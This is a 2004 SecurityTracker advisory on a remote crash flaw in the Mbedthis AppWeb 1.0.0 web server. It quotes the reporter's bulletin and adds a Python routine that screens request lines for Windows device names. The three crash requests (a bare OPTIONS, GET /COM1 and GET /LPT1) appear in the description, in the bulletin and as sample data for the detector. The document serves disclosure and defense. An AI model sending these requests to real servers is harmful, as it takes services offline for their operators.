SecurityTracker.com

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Mbedthis AppWeb
Vendors:   Mbedthis Software
Mbedthis AppWeb Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1008848
SecurityTracker URL:  http://securitytracker.com/id/1008848
CVE Reference:   GENERIC-MAP-NOMATCH
Updated:  Feb 3 2004
Original Entry Date:  Jan 26 2004
Impact:   Denial of service via network
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): 1.0.0
Description:   Ziv Kamir of Global Security Solution IT (GSSIT) reported a vulnerability in the Mbedthis AppWeb web server software. A remote user can crash the web service.

It is reported that a remote user can send any of the following types of HTTP requests to the target server to cause the web service to crash:

OPTIONS

GET /COM1 HTTP/1.0

GET /LPT1 HTTP/1.0

The vendor was reportedly notified on January 25, 2004.

Impact:   A remote user can cause the web service to crash.
Solution:   The vendor has issued a fixed version (1.0.1), available at:

http://www.mbedthis.com/downloads/appWeb/info.php
http://www.mbedthis.com/downloads/appWeb/index.html

Vendor URL:  www.mbedthis.com/products/appWeb/index.html
Cause:   Exception handling error
Underlying OS:  Windows (NT), Windows (95), Windows (98), Windows (2000)
Underlying OS Comments:  Vendor notes that Windows 95, 98, and 2000 are not officially supported platforms and that Windows XP and Windows 2003 are not affected.

Message History:   None.
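
A screening check for the three request types listed in the Description above, as an added example that is not SecurityTracker's, the reporter's or the vendor's code and is not the 1.0.1 fix. The function names and sample lines are constructed; it assumes the bare OPTIONS entry means a request line with no target, and it generalizes beyond COM1 and LPT1 to the other Windows reserved device names.

```python
import re
from urllib.parse import unquote

# Windows reserved device names. The advisory lists COM1 and LPT1; the other
# names are a generalization added for this example.
RESERVED = re.compile(r"^(con|prn|aux|nul|com[1-9]|lpt[1-9])$", re.IGNORECASE)

def classify_request_line(line):
    """Return 'incomplete', 'device-name' or 'ok' for one HTTP request line."""
    parts = line.strip().split()
    if len(parts) < 2:
        return "incomplete"            # method with no target, e.g. bare "OPTIONS"
    target = parts[1]
    if target == "*":
        return "ok"                    # "OPTIONS * HTTP/1.1" is a valid form
    # Drop query and fragment, then percent-decode so %4cpt1 is seen as Lpt1.
    path = unquote(re.split(r"[?#]", target, maxsplit=1)[0])
    for segment in re.split(r"[/\\]", path):
        # Windows still resolves the device when the name carries an
        # extension, a colon or trailing spaces ("COM1.txt", "LPT1:").
        stem = re.split(r"[.:]", segment, maxsplit=1)[0].rstrip(" ")
        if RESERVED.match(stem):
            return "device-name"
    return "ok"

def screen(lines):
    """Return (line, verdict) pairs for every line that is not 'ok'."""
    verdicts = ((line, classify_request_line(line)) for line in lines)
    return [(line, v) for line, v in verdicts if v != "ok"]

# Constructed sample request lines (not captured traffic).
SAMPLE = [
    "OPTIONS",
    "GET /COM1 HTTP/1.0",
    "GET /LPT1 HTTP/1.0",
    "GET /docs/%4cpt1.txt HTTP/1.0",
    "GET /index.html HTTP/1.0",
    "OPTIONS * HTTP/1.1",
    "GET /compose HTTP/1.0",
]

if __name__ == "__main__":
    for line, verdict in screen(SAMPLE):
        print(f"{verdict:12} {line!r}")
```

The same classification can sit in a reverse proxy or log pipeline in front of a server that cannot yet be upgraded to the fixed version.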


 Source Message Contents

Subject:  Mbedthis AppWeb


26/01/04


====================================
 GSSIT - Global Security Solution IT
====================================		

-------------------------------------------------------

Application: Mbedthis AppWeb
Web Site:    http://www.mbedthis.com
Versions:    1.0.0
Platform:    Tested On win2k
Bug :        D.O.S
             
                           
Credits:
########

#########################################
#         ==  Ziv Kamir ==              #
#                                       #
# GSSIT - Global Security Solution IT   #                   
#                                       #
#     Email : gss_it@yahoo.com          #
#                                       #
#                                       #
#########################################

---------------------

1) Introduction
2) Bug
3) The Code
4) Fix


================
1) Introduction
================

Mbedthis AppWeb is the first embedded web server that has been designed 
from the start with security in mind. It is a very fast, small-footprint,
standards based server specifically developed for use by applications and embedded devices. 


=======
2) Bug
=======


A remote user can crash the web server.




===========
3) The Code
===========

A remote user can send the following requests to crash the server:

1) OPTIONS

2) GET /COM1 HTTP/1.0
  
3) GET /LPT1 HTTP/1.0




======
4) Fix
======

Date of Vendor Notification:
----------------------------

25/01/04

Response:
---------

Thanks for the feedback,


==============================================================================================

                 *** The Data is for educational purpose only. *** 

          The information in this bulletin is provided "AS IS" without 
          warranty of any kind. In no event shall we be liable for any 
          damages whatsoever including direct, indirect, incidental, 
          consequential, loss of business profits or special damages. 

==============================================================================================


Copyright 2021, SecurityGlobal.net LLC